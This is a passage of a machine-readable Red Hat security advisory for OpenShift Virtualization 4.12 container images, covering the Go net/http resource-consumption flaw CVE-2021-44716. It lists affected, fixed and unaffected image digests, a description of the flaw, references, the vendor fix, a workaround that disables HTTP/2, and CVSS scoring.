"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: out-of-bounds read in golang.org/x/text/language leads to DoS", }, { cve: "CVE-2021-44716", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2021-12-09T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2030801", }, ], notes: [ { category: "description", text: "There's an uncontrolled resource consumption flaw in golang's net/http library in the canonicalHeader() function. An attacker who submits specially crafted requests to applications linked with net/http's http2 functionality could cause excessive resource consumption that could lead to a denial of service or otherwise impact to system performance and resources.", title: "Vulnerability description", }, { category: "summary", text: "golang: net/http: limit growth of header canonicalization cache", title: "Vulnerability summary", }, { category: "other", text: "For OpenShift Container Platform, OpenShift Virtualization, Red Hat Quay and OpenShift distributed tracing the most an attacker can possibly achieve by exploiting this vulnerability is to crash a container, temporarily impacting availability of one or more services. Therefore impact is rated Moderate.\n\nIn its default configuration, grafana as shipped in Red Hat Enterprise Linux 8 is not affected by this vulnerability. However, enabling http2 in /etc/grafana/grafana.ini explicitly would render grafana affected, therefore grafana has been marked affected.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2021-44716", }, { category: "external", summary: "RHBZ#2030801", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2030801", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2021-44716", url: "https://www.cve.org/CVERecord?id=CVE-2021-44716", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", url: "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", }, ], release_date: "2021-12-09T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, { category: "workaround", details: "This flaw can be mitigated by disabling HTTP/2. Setting the GODEBUG=http2server=0 environment variable before calling Serve will disable HTTP/2 unless it was manually configured through the golang.org/x/net/http2 package.", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", 